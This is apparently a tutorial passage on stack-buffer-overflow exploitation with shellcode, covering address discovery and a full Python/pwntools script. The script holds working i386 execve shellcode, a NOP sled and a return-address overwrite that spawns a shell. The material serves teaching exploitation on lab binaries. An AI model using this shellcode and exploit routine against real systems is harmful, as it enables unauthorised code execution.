In real exploits, it's not particularly likely that you will have a `win()` function lying around. Shellcode is a way to run your own instructions, giving you the ability to run arbitrary commands on the system: we write the machine code into the vulnerable buffer itself and then overwrite the return pointer so that execution "returns" into our own input rather than into existing code. This only works if the stack is executable, so the binary must have NX disabled (check with `checksec`).

Let's disassemble `vuln()` using radare2 and work out where in memory the buffer starts; this is where we want to point the return pointer to. Break on the `gets()` call and find the exact address.

The buffer starts at `0xffffcfd4`; if we run the binary multiple times, it should remain where it is (if it doesn't, make sure ASLR is disabled!). Even with ASLR off, the address can shift by a few bytes between a run under the debugger and a plain run if the environment differs (argv, environment variables), which is the usual reason an address that looks right in the debugger fails outside it.

We set `context.binary` to our binary; this grabs stuff like the arch, OS and bits and enables pwntools to provide us with working shellcode. We can then simply call `process()` with no arguments, because once `context.binary` is set it is assumed to use that binary. After sending the payload we call `p.interactive()`, which enables us to communicate with the shell.

If you get an `EOFError`, the process died instead of spawning a shell: print out the shellcode and try to find it in memory - the stack address may be wrong.
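The payload layout described above, as an added example that is not the page's own exploit script. It builds the payload with the standard library only, so the layout can be checked without a target, and adds the two checks a practitioner wants when the address is uncertain: a NOP sled that the return address is aimed at the middle of (so a buffer address that is off by a few bytes still lands on executable NOPs), and a scan for bytes `gets()` cannot deliver. It assumes a 32-bit x86 Linux target with NX and ASLR off; `OFFSET`, `BUFFER_ADDR` and the binary name `./vuln` are placeholders for the values you measure yourself, and the embedded i386 shellcode stands in for pwntools' `asm(shellcraft.sh())`.

```python
#!/usr/bin/env python3
# Added example (not the page's own exploit script): build the stack-shellcode payload
# with the standard library only, so its layout can be inspected without a target.
# Assumptions: 32-bit x86 Linux, a gets()-style overflow, NX and ASLR off.
# OFFSET, BUFFER_ADDR and ./vuln are placeholders for values you measure yourself.
import struct

# Classic 23-byte i386 execve("/bin//sh", NULL, NULL). pwntools' asm(shellcraft.sh())
# emits an equivalent (longer) stub; either works as long as the stack is executable.
SHELLCODE_I386 = (
    b"\x31\xc0"      # xor  eax, eax
    b"\x50"          # push eax           ; NUL terminator for the path
    b"\x68//sh"      # push 0x68732f2f    ; "//sh"
    b"\x68/bin"      # push 0x6e69622f    ; "/bin"  -> esp points at "/bin//sh\0"
    b"\x89\xe3"      # mov  ebx, esp      ; filename
    b"\x89\xc1"      # mov  ecx, eax      ; argv = NULL
    b"\x89\xc2"      # mov  edx, eax      ; envp = NULL
    b"\xb0\x0b"      # mov  al, 11        ; SYS_execve
    b"\xcd\x80"      # int  0x80
)
NOP = b"\x90"
# gets() stops reading at a newline, so 0x0a must not appear anywhere in the payload
# (a NUL byte is fine for gets(); it would not be for a strcpy()-style bug).
BAD_BYTES = b"\x0a"


def find_bad_bytes(payload):
    """Return the offsets in payload that hold a byte gets() cannot deliver."""
    return [i for i, b in enumerate(payload) if b in BAD_BYTES]


def build_payload(buffer_addr, offset, shellcode=SHELLCODE_I386, sled=0):
    """Shellcode (optionally behind a NOP sled) at the buffer start, padding up to
    the saved return address, then the address to return into.

    buffer_addr: where the buffer starts on the stack (0xffffcfd4 in the write-up)
    offset:      bytes from the buffer start to the saved EIP
    sled:        NOPs placed before the shellcode; the return address is aimed at the
                 middle of the sled, so a buffer address that is off by up to sled/2
                 bytes in either direction still lands on NOPs and slides into the code
    """
    body = NOP * sled + shellcode
    if len(body) > offset:
        raise ValueError("sled + shellcode (%d bytes) does not fit in the %d bytes before "
                         "the return address" % (len(body), offset))
    target = buffer_addr + sled // 2
    payload = body.ljust(offset, b"A") + struct.pack("<I", target)
    bad = find_bad_bytes(payload)
    if bad:
        raise ValueError("payload holds bytes gets() will not read at offsets %r" % bad)
    return payload


def layout(buffer_addr, offset, shellcode=SHELLCODE_I386, sled=0):
    """Where each part of the payload lands in memory; compare this against the
    debugger when the shell does not appear (EOFError)."""
    return {
        "sled": (buffer_addr, buffer_addr + sled),
        "shellcode": (buffer_addr + sled, buffer_addr + sled + len(shellcode)),
        "saved_eip": buffer_addr + offset,
        "return_to": buffer_addr + sled // 2,
    }


if __name__ == "__main__":
    # Live run, mirroring the write-up; needs pwntools and the target binary.
    BUFFER_ADDR = 0xffffcfd4   # placeholder: the address found in the debugger
    OFFSET = 64                # placeholder: measured distance to the saved EIP
    payload = build_payload(BUFFER_ADDR, OFFSET, sled=16)
    try:
        from pwn import ELF, context, process
    except ImportError:
        raise SystemExit("pwntools not installed; layout: %r" % layout(BUFFER_ADDR, OFFSET, sled=16))
    context.binary = ELF("./vuln")   # arch, OS and bits now feed asm(), p32() and process()
    p = process()                    # no path needed: context.binary is used
    p.clean()
    p.sendline(payload)
    p.interactive()
```

The `layout()` dictionary is what to compare against the debugger when you hit an `EOFError`: if `x/32xb` at `return_to` does not show `0x90` or the first shellcode bytes, the buffer address you measured is not the one the real run uses.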